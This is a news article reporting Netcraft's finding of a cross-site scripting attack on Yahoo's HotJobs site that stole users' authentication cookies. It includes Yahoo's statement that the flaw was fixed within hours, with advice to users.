Update: Cross-site scripting attack targets Yahoo user accounts

Posted by Wolfgang Gruener

Chicago (IL) - Netcraft today said that a Yahoo website is currently under attack to obtain authentication cookies from Yahoo users. The Internet analysis firm warns that the data would allow the attacker to gain access to Yahoo accounts, such as Yahoo Mail.

According to Netcraft, the attack focuses on a cross-site scripting vulnerability on Yahoo's HotJobs site, which allows the hacker to inject malicious JavaScript code into the page. The script reads the Yahoo authentication cookies and sends them “to a different website in the United States” – a site where the account information of users is stored.

Netcraft said that it blocked a similar flaw on Yahoo's ychat.help.yahoo.com website earlier this year, which also was affected by a cross-site scripting vulnerability. The code, however, was injected not from within the U.S., but from a server in Spain.

The company explained that “simply visiting the malign URLs on yahoo.com can be enough for a victim to fall prey to the attacker, letting him steal the necessary session cookies to gain access to the victim's email” and continued: “the victim does not even have to type in their username and password for the attacker to do this”. If a user is attacked, he will be sent to a blank webpage, which will not necessarily be enough indication for most users that critical information such as passwords may have been compromised.

Netcraft said it has informed Yahoo of the latest attack, but did not know if the attack was still active on the Hotjobs website.

Yahoo issued the following statement in response to the attack:

"Security is an industry-wide issue and one that Yahoo! treats seriously. Yahoo! considers users' security as a priority and continues to take a hard look at how to effectively combat malicious behavior and protect its users.

The team was made aware of this particular Cross-Site Scripting issue yesterday morning (Sunday, Oct. 26) and a fix was deployed within a matter of hours. Yahoo! appreciates Netcraft's assistance in identifying this issue.

As a safety precaution, we recommend users change their passwords, should they still be concerned. Users should always verify via their Sign-in Seal that they are giving their passwords to Yahoo.com.

As part of Yahoo!'s ongoing efforts to educate consumers about fraud and online scams, Yahoo! offers a guide to online security at http://security.yahoo.com/.

Yahoo! also has a link for consumers to report scams at http://abuse.yahoo.com. Yahoo! customer care has a process for these issues and we are always evaluating these processes to ensure that these matters are escalated and handled appropriately."